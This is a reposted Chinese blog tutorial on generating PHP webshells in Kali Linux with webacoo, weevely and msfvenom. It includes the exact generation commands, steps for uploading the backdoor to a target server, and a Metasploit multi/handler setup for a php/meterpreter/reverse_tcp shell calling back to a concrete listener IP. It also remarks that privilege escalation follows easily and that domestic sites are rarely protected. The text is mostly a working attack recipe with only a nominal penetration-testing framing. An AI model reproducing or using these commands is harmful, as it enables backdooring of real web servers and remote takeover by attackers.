很多时候在渗透测试时选择web木马害怕用的别人的马带有后门,这样自己的辛苦就要被别人不劳而获,很多时候我们都想拥有自己的马,那么这个时候你就应该使用kail来生成一个自己独特密码的web木马了。
Kali Linux自带有好几个web木马生成工具,下面我们来简单看几个:
1.webacoo后门
webacoo -g -o test.php
-g 制作后门代码
-o 输出生成指定的后门程序文件名
<a href="http://s2.51cto.com/wyfs02/M02/77/3C/wKioL1Zli82gQMVfAAAu6riv1A0061.png" target="_blank"></a>
把web后门上传到目标服务器后
使用kali linux访问如下
注意:上传的路径一定要正确
最后退出的时候使用exit退出
2.weevely
查看帮助信息
<a href="http://s4.51cto.com/wyfs02/M00/77/3C/wKioL1Zli8-BvBjMAAAk1biLZUM186.png" target="_blank"></a>
生成后门
下列命令可以生产混搅PHP backdoor , 密码password 后门名字disaplay.php
weevely generate password disaplay.php
<a href="http://s1.51cto.com/wyfs02/M01/77/3C/wKioL1Zli9CTIbX0AAAzLMyt8MA048.png" target="_blank"></a>
把后门文件上传到服务器后,如下命令可以成功访问
通过help看到weevely有很多的module
.net.ifaces 查看服务器的端口信息
.net.scan 202.205.xx.xx 22 对服务器某个端口扫描
3.PHP Meterpreter
metasploit有一个名为PHP Meterpreter的payload,可创建具有meterpreter功能的PHP webshell。
Metasploit的msfvenom工具可以制作PHP Meterpreter,命令如下:
msfvenom -p php/meterpreter/reverse_tcp LHOST=自己监听的IP -f raw > php_meter.php
-p 设置payload
-f 设置输出文件格式
<a href="http://s4.51cto.com/wyfs02/M01/77/3C/wKioL1Zli8-QE6pRAAAcwP6E-4M289.png" target="_blank"></a>
<a href="http://s4.51cto.com/wyfs02/M01/77/3E/wKiom1Zli2DRN9KlAAAl3u1nWKs170.png" target="_blank"></a>
但是使用前需要注意生成文件的第一行被注释了,所以需要把注释去掉才能使用
把webshell上传到目标服务器,本地监听打开如下:
启动msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 202.205.7.162
<a href="http://s5.51cto.com/wyfs02/M00/77/3E/wKiom1Zli1_xIK6FAAAtU0mx_E0849.png" target="_blank"></a>
然后我们就可以使用kali的metasploit功能对目标服务器进行一系列操作。
这种WEBSHELL 利用起来相当方便,输入shell命令之后,就可以随便提权什么的了.
1,国内的貌似没有防护这块的,国内大多只防护GET POST COOKIE这些数据.
2,缺点是如果服务器在DMZ,则失效.
3,more what ..... 这种shell如果被利用多了,肯定会有硬件厂商去做防护的.
本文转自Tar0 51CTO博客,原文链接:http://blog.51cto.com/tar0cissp/1720542,如需转载请自行联系原作者